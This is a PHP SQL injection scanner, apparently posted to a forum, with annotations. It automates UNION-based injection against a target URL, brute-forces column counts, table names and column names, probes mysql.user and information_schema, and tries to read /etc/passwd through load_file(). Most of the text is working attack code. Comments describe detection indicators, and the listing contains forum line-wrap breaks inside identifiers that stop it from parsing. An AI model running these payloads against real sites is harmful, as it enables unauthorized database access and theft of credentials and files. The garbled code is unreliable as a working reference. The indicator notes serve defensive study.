    [align=LEFT][align=CENTER]Sql Injection Scanner v1[/align]

    <?php
    // Forum-posted UNION-based SQL injection probe, rendered as a self-posting
    // HTML form. One POST drives the whole run: a column-count sweep, then
    // optional follow-up probes (mysql.user, information_schema, table/column
    // wordlists, load_file()). Every network fetch and every error is silenced
    // with @, and the target URL comes straight from the POST body with no
    // authentication or validation, so a copy of this file left reachable on a
    // web server lets any visitor make that server issue outbound requests.
    // As pasted, the listing carries forum line-wrap artifacts (spaces inside a
    // few identifiers) and does not parse; the code is reproduced unchanged.
    @set_time_limit(0);
    /*
    F-Security - Sql InyeXion Scanner v1
    Developed by Knet
    Administrators - www.remoteexecution.org
    Contact:
    [email protected] [ Mail ]
    [email protected] [ Msn ]
    */
    // Raw POST fields, read without any validation. $web is the target URL
    // prefix, $end the suffix appended after each payload (the form defaults it
    // to '--'), $max the largest column count tried, $union / $from_format index
    // the payload tables below; the S/N flags enable the follow-up probes.
    $web=$_POST['web'];
    $end=$_POST['end'];
    $scann=$_POST['scann'];
    $union=$_POST['union'];
    $max=$_POST['max'];
    $from_format=$_POST['from'];
    $MySqluser=$_POST['MySqluser'];
    $InforMationSchema=$_POST['InforMationSchema'];
    $TblBrt=$_POST['TblBrt'];
    $TblFormat=$_POST['TblFormat'];
    $ColBrt=$_POST['ColBrt'];
    $ColFormat=$_POST['ColFormat'];
    $LdFl=$_POST['LdFl'];
    // Reflection marker. It is always sent hex-encoded (bin2hex('err0r') ==
    // '6572723072', so the literal 0x6572723072 appears in every request) and
    // each response body is searched for the plain text. Either form in access
    // logs or in a captured response is a direct indicator of this tool.
    $string='err0r';
    // UNION SELECT prefixes selectable in the form. The entries differ only in
    // the leading value, the quote, ALL, and the separator ('+' vs '/**/'); the
    // comment-as-whitespace forms are the usual filter-evasion spellings and
    // are what a request-log search or WAF rule would key on.
    $union_array=array(
    '-1+UNION+SELECT+',
    '-1\'+UNION+SELECT+',
    '-1+UNION+ALL+SELECT+',
    '-1\'+UNION+ALL+SELECT+',
    '-1/**/UNION/**/SELECT/**/',
    '-1\'/**/UNION/**/SELECT/**/',
    '-1/**/UNION/**/ALL/**/SELECT/**/',
    '-1\'/**/UNION/**/ALL/**/SELECT/**/',
    '1+UNION+SELECT+',
    '1\'+UNION+SELECT+',
    '1+UNION+ALL+SELECT+',
    '1\'+UNION+ALL+SELECT+',
    '1/**/UNION/**/SELECT/**/',
    '1\'/**/UNION/**/SELECT/**/',
    '1/**/UNION/**/ALL/**/SELECT/**/',
    '1\'/**/UNION/**/ALL/**/SELECT/**/'
    );
    $count_union_array=count($union_array) + 1;
    // FROM keyword spellings, same separator variants as above plus %20.
    $from_array=array(
    '+from+',
    '/**/from/**/',
    '+FROM+',
    '/**/FROM/**/',
    '%20from%20',
    '%20FROM%20'
    );
    $count_from_array=count($from_array) + 1;
    // Selected prefix pieces. $iny_2 accumulates the column list during the
    // sweep below; $iny_3 is the bare marker appended for each extra column.
    $from=$from_array[$from_format];
    $iny_1=$union_array[$union];
    $iny_2='0x'.bin2hex($string);
    $iny_3='0x'.bin2hex($string);
    // Floor the column count at 3; non-numeric or empty input falls back too.
    if($max<3 || $max=="" || !is_numeric($max))
    {
    $max=3;
    }
    ?>
    <form action="" method="POST">
    <table>
    <tr>
    <td><h1>Sql InyeXion Scanner F-Security Team</h1></td>
    </tr>
    <tr>
    <td>Web:
    <input id="boton" type="text" name="web" value="
    <?php if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>
    " size="60">
    </td>
    <td>Union*:
    <SELECT name="union" size="1" id="boton">
    <?php
    // One <option> per UNION prefix; the value is the array index posted back.
    for($union_for=0;$union_for<=$count_union_array;$u nion_for++)
    {
    if($union_array[$union_for]!="")
    {
    echo '<OPTION VALUE="'.$union_for.'">'.$union_array[$union_for].'</OPTION>'."\n";
    }
    }
    ?>
    </SELECT>
    <td>Max columns:
    <SELECT name="max" size="1" id="boton">
    <?php
    // Column-count choices 1..255.
    for($max_a=1;$max_a<=255;$max_a++)
    {
    echo '<OPTION VALUE="'.$max_a.'">'.$max_a.'</OPTION>'."\n";
    }
    ?>
    </SELECT>
    </td>
    <td>eND:
    <input id="boton" type="text" name="end" value="
    <?php if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">
    </td>
    </tr>
    </table>
    <table>
    <tr>
    <td>From* Format:
    <td>
    <SELECT name="from" size="1" id="boton">
    <?php
    // One <option> per FROM spelling; the value is the array index posted back.
    for($from_for=0;$from_for<=$count_from_array;$from _for++)
    {
    if($from_array[$from_for]!="")
    {
    echo '<OPTION VALUE="'.$from_for.'">'.$from_array[$from_for].'</OPTION>'."\n";
    }
    }
    ?>
    </SELECT>
    </td>
    </tr>
    </table>
    <table>
    <tr>
    <td>Test mysql.user:</td>
    <td>Yes</td>
    <td><input type="radio" name="MySqluser" value="S" checked></td>
    <td>No</td>
    <td><input type="radio" name="MySqluser" value="N"></td>
    </tr>
    <tr>
    <td>Test information_schema:</td>
    <td>Yes</td>
    <td><input name="InforMationSchema" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="InforMationSchema" value="N"></td>
    </tr>
    <tr>
    <td>Tables BruteForce:</td>
    <td>Yes</td>
    <td><input name="TblBrt" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="TblBrt" value="N"></td>
    <td>|</td>
    <td>tablename</td>
    <td><input type="radio" name="TblFormat" value="1" checked></td>
    <td>|</td>
    <td>TableName</td>
    <td><input type="radio" name="TblFormat" value="2"></td>
    <td>|</td>
    <td>TABLENAME</td>
    <td><input type="radio" name="TblFormat" value="3"></td>
    </tr>
    <tr>
    <td>Columns BruteForce:</td>
    <td>Yes</td>
    <td><input name="ColBrt" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="ColBrt" value="N"></td>
    <td>|</td>
    <td>columname</td>
    <td><input type="radio" name="ColFormat" value="1" checked></td>
    <td>|</td>
    <td>ColumName</td>
    <td><input type="radio" name="ColFormat" value="2"></td>
    <td>|</td>
    <td>COLUMNAME</td>
    <td><input type="radio" name="ColFormat" value="3"></td>
    </tr>
    <tr>
    <td>Test load_file():</td>
    <td>Yes</td>
    <td><input type="radio" name="LdFl" value="S" checked></td>
    <td>No</td>
    <td><input type="radio" name="LdFl" value="N"></td>
    </tr>
    <tr>
    <td><input id="boton" type="submit" name="scann" value="Scann"></td>
    </tr>
    </table>
    <table>
    <tr>
    <td>
    <?php
    // ---- Phase 1: column-count sweep -------------------------------------
    // Runs only after the form is submitted with a non-empty target. Each pass
    // appends one more hex marker ('err0r-1', 'err0r-2', ...) to the SELECT list
    // and fetches $web . prefix . list . $end. The first response that contains
    // the marker ends the sweep; the inner loop then records which positions
    // actually reflect ('err0r-N' present) into $vulns for the later probes.
    if(isset($scann) && $web!="")
    {
    for($a_for=1;$a_for<=$max;$a_for++)
    {
    // '2d' is the hex of '-', so the marker for this column is 'err0r-N'.
    $iny_2=$iny_2.'2d'.bin2hex($a_for);
    $iny=$web.$iny_1.$iny_2;
    $webmas = $iny;
    $contenido = @file_get_contents($webmas.$end);
    $alert = strpos($contenido,$string);
    if(!$alert)
    {
    // Not reflected yet: keep the column, add a fresh marker for the next one.
    $iny_2=$iny_2.','.$iny_3;
    $iny_vuln .= $a_for.',';
    }
    else
    {
    // Marker reflected: $f_num is the working column count, $web_final the
    // URL that produced it. Output is echoed and mirrored into
    // $_SESSION['all_saveds']; no session_start() appears in this listing.
    $f_num=$a_for;
    $web_final=$web.$iny_1.$iny_vuln.$f_num;
    //echo $webmas;
    echo '[+] Bug Found in: '.$a_for."<br>".'<a href="'.htmlentities($web_final.$end).
    '" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>";
    echo 'vuln in num/s: |';
    /*********************************SAVING********* ******************************/
    $_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for.
    "<br>".'<a href="'.htmlentities($web_final.$end).
    '" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>".'vuln in num/s: |';
    /*********************************SAVING********* ******************************/
    // Which of the 1..$f_num positions echo their own marker back.
    $vulns=array();
    for($search_for=1;$search_for<=$a_for;$search_for+ +)
    {
    if(strpos($contenido,$string.'-'.$search_for))
    {
    echo $search_for.'|';
    /*********************************SAVING********* *************
    *****************/
    $_SESSION['all_saveds'] .= $search_for.'|';
    /*********************************SAVING********* *************
    *****************/
    array_push($vulns,$search_for);
    }
    }
    /*********************************SAVING********* ******************************/
    $_SESSION['all_saveds'] .= "<br>".'---------------------------------------------'.
    '------------------------------------------------'."<br>";
    /*********************************SAVING********* ******************************/
    echo "<br>".'---------------------------------------------'.
    '------------------------------------------------'."<br>";
    // Stop the sweep and flag success; the constant gates every phase below.
    $a_for=$max;
    define('vuln','yes');
    }
    if(!$alert && $a_for==$max)
    {
    echo 'no vuln in 1->'.$max."\n";
    }
    $contenido='';
    }
    }
    /* END SIMPLE SCAN */
    // ---- Phase 2: mysql.user reachability -----------------------------------
    // Re-sends the working payload with a FROM mysql.user clause and reports
    // whether the marker still reflects. $webmas/$web_final/$from are only set
    // once phase 1 has run.
    if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
    {
    $from_mysql_user=$from.'mysql.user';
    $contenido = @file_get_contents($webmas.$from_mysql_user.$end);
    $alert_mysql_user = strpos($contenido,$string);
    if($alert_mysql_user)
    {
    echo '[+] MySQL Database Found:'.'<br>';
    echo '<a href="'.htmlentities($web_final.$from_mysql_user.$ end).'" TARGET=BLANK>'.
    htmlentities($web_final.$from_mysql_user.$ end).'</a>'."<br>";
    echo '[+] Columns default in mysql.user: Host,User,Password'.'<br>';
    }
    else
    {
    echo '[+] MySQL Database not Found:'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* END mysql.user TEST */
    // ---- Phase 3: information_schema reachability ---------------------------
    // Same check as phase 2 against information_schema.tables.
    if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S")
    {
    $from_information_schema=$from.'information_schema .tables';
    $contenido = @file_get_contents($webmas.$from_information_schem a.$end);
    $alert_information_schema = strpos($contenido,$string);
    if($alert_information_schema)
    {
    echo '[+] Information_Schema Database Found:'.'<br>';
    echo '<a href="'.htmlentities($web_final.$from_information_ schema .$end).'" TARGET=BLANK>'.
    htmlentities($web_final.$from_information_schema.$ end).'</a>'."<br>";
    echo '[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'<br>';
    echo '---------------'."<br>";
    echo '[+] Columns default in information_schema.columns:
    TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'.'<br>';
    }
    else
    {
    echo '[+] Information_Schema Database not Found:'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* END information_schema database */
    // ---- Phase 4: table and column wordlists --------------------------------
    // Table names come from 1.txt / 2.txt / 3.txt next to the script (the form
    // labels them lowercase / CamelCase / UPPERCASE). Each name is tried as a
    // FROM clause; one request per wordlist line, so a run against a site shows
    // up as a burst of near-identical requests that differ only in the table.
    if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat))
    {
    switch($TblFormat)
    {
    case 1:
    $file_txt_tables='1.txt';
    break;
    case 2:
    $file_txt_tables='2.txt';
    break;
    case 3:
    $file_txt_tables='3.txt';
    break;
    default:
    $file_txt_tables='1.txt';
    }
    $file_tables=@file($file_txt_tables);
    $count_tables=count($file_tables);
    for($t_for=0;$t_for<=$count_tables;$t_for++)
    {
    $file_tables[$t_for]=trim($file_tables[$t_for]);
    if($file_tables[$t_for] != "")
    {
    $from_table=$from.$file_tables[$t_for];
    $contenido = @file_get_contents($webmas.$from_table.$end);
    $alert_table = strpos($contenido,$string);
    if($alert_table)
    {
    echo '[+] Table Found: '.$file_tables[$t_for]."<br>";
    echo '<a href="'.htmlentities($web_final.$from_table.$end). '" TARGET=BLANK>'.
    htmlentities($web_final.$from_table.$end).'</a>'."<br>";
    /*
    echo 'webmas:'.$webmas.'<br>';
    echo 'webfinal:'.$web_final.'<br>';
    echo 'web:'.$web.'<br>';
    */
    // For each table that reflected, try every column name from the chosen
    // wordlist: reflected positions (those in $vulns) are replaced by
    // concat(marker, <name>), the rest keep their number, and a marker in
    // the response means the column exists. Found names are collected in
    // $cols_vulns and printed once per table.
    if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat))
    {
    /************************************************** **************
    *******/
    switch($ColFormat)
    {
    case 1:
    $file_txt_columns='1.txt';
    break;
    case 2:
    $file_txt_columns='2.txt';
    break;
    case 3:
    $file_txt_columns='3.txt';
    break;
    default:
    $file_txt_columns='1.txt';
    }
    $file_columns=@file($file_txt_columns);
    $count_columns=count($file_columns);
    $count_vulns=count($vulns);
    $count_vulns = $count_vulns + 1;
    for($c_for=0;$c_for<=$count_columns;$c_for++)
    {
    $file_columns[$c_for]=trim($file_columns[$c_for]);
    if($file_columns[$c_for] != "")
    {
    // Rebuild the SELECT list for this candidate column name.
    for($cols_for=1;$cols_for<=$f_num;$cols_for++)
    {
    if(in_array($cols_for,$vulns))
    {
    if($cols_for != $f_num)
    {
    $cols_brt_string .= 'concat(0x'.bin2hex($string).
    ','.
    $file_columns[$c_for].'),';
    }
    else
    {
    $cols_brt_string .= 'concat(0x'.bin2hex($string).
    ','.
    $file_columns[$c_for].')';
    }
    }
    else
    {
    if($cols_for != $f_num)
    {
    $cols_brt_string .= $cols_for.',';
    }
    else
    {
    $cols_brt_string .= $cols_for;
    }
    }
    }
    $col_contenido=@file_get_contents($web.
    $iny_1.$cols_brt_string.$from_table.$end);
    $alert_col = strpos($col_contenido,$string);
    if($alert_col)
    {
    if($cols_vulns=="")
    {
    $cols_vulns =
    $file_columns[$c_for];
    }
    else
    {
    $cols_vulns .= ','.
    $file_columns[$c_for];
    }
    /*
    $cols_brt_string=str_replace('concat(0x'.bin2hex($ string).',','',
    $cols_brt_string);
    $cols_brt_string=str_replace(')','',
    $cols_brt_string);
    echo '[+] Column Found in '.
    $file_tables[$t_for].
    ': '.$file_columns[$c_for].'<br>';
    echo '<a href="'.
    htmlentities($web.
    $iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'.
    htmlentities($web.
    $iny_1.$cols_brt_string.$from_table.$end).'</a>'."<br>";
    */
    }
    $cols_brt_string='';
    }/**/
    }
    if($cols_vulns!="")
    {
    echo '[+] Column/s Found in '.$file_tables[$t_for].' : '.
    $cols_vulns.'<br>';
    $cols_vulns='';
    }
    /************************************************** **************
    *******/
    }
    echo '-------------------------------'."<br>";
    }
    }
    }
    }
    /* END TABLE AND COLUMNS BRUTEFORCE */
    // ---- Phase 5: load_file() check ----------------------------------------
    // Places a load_file() call in a reflected column position (the constant
    // load_file limits this to the first one) and reports ENABLED if the
    // response contains 'root:x:'. That marker in a response body, or a
    // request carrying load_file(0x2f6574632f706173737764), is the signal a
    // defender would alert on; the file read itself indicates the database
    // account holds FILE privilege and secure_file_priv is not restricting it.
    if(vuln=="yes" && isset($LdFl) && $LdFl=="S")
    {
    $string_alert_loadfile = 'root:x:';
    for($load_file_for=1;$load_file_for<=$f_num;$load_ file_for++)
    {
    if(in_array($load_file_for,$vulns) && load_file!="yes")
    {
    if($load_file_for != $f_num)
    {
    $load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.',';
    }
    else
    {
    $load_file_string .= 'load_file('.$load_file_for.')';
    }
    define('load_file','yes');
    }
    else
    {
    if($load_file_for != $f_num)
    {
    $load_file_string .= $load_file_for.',';
    }
    else
    {
    $load_file_string .= $load_file_for;
    }
    }
    }
    $web_load=$web.$iny_1.$load_file_string.$end;
    $contenido_load = @file_get_contents($web_load);
    $alert_load_file = strpos($contenido_load,$string_alert_loadfile);
    echo '[+] load_file(): ';
    if($alert_load_file)
    {
    echo 'ENABLED'.'<br>';
    echo '<a href="'.htmlentities($web_load).'" TARGET=BLANK>'.
    htmlentities($web_load).'</a>'."<br>";
    }
    else
    {
    echo 'DISABLED'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* END LOAD_FILE() TEST */
    ?>
